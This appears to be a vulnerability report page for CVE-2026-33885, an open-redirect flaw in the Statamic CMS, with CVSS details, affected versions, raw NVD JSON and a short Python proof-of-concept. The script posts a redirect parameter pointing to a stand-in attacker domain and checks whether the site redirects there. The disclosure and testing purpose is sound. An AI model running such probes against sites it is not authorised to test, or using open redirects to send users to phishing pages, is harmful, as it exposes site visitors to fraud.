Security Vulnerability Report
CVE-2026-33885 CVSS 6.1 MEDIUM

CVE-2026-33885

Published: 2026-03-27 21:17:25
Last Modified: 2026-04-08 14:07:19

Description

Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (versions before 5.73.16)
cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:* - VULNERABLE (versions from 6.0.0 up to, but excluding, 6.7.2)
Statamic CMS < 5.73.16
Statamic CMS 6.0.0 <= version < 6.7.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-33885 (Open Redirect)
# This script checks if the redirect parameter can be used to redirect to an external domain.
import requests


def check_open_redirect(target_url, redirect_param):
    # Construct the malicious payload
    payload = {redirect_param: "https://evil.com"}
    try:
        # Send request to the vulnerable endpoint without following redirects,
        # so the Location header of the initial response can be inspected
        response = requests.post(target_url, data=payload, allow_redirects=False, timeout=10)
        # Check the Location header for the redirect
        location = response.headers.get("Location", "")
        if "evil.com" in location:
            print(f"[+] Vulnerable! Redirecting to: {location}")
            return True
        else:
            print("[-] Not vulnerable or payload invalid.")
            return False
    except Exception as e:
        print(f"Error: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-site.com/submit"  # Replace with actual endpoint
    check_open_redirect(target, "redirect")

References

https://github.com/statamic/cms/security/advisories/GHSA-7f74-7q5w-hj4r (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33885", "sourceIdentifier": "[email protected]", "published": "2026-03-27T21:17:25.337", "lastModified": "2026-04-08T14:07:18.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.16 and 6.7.2, the external URL detection used for redirect validation on unauthenticated endpoints could be bypassed, allowing users to be redirected to external URLs after actions like form submissions and authentication flows. This has been fixed in 5.73.16 and 6.7.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.73.16", "matchCriteriaId": "EACDC143-742E-4926-9C28-6095690EB549"}, {"vulnerable": true, "criteria": "cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.7.2", "matchCriteriaId": "631FF065-0872-4DC7-AB25-AB74B782A9BE"}]}]}], "references": [{"url": "https://github.com/statamic/cms/security/advisories/GHSA-7f74-7q5w-hj4r", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}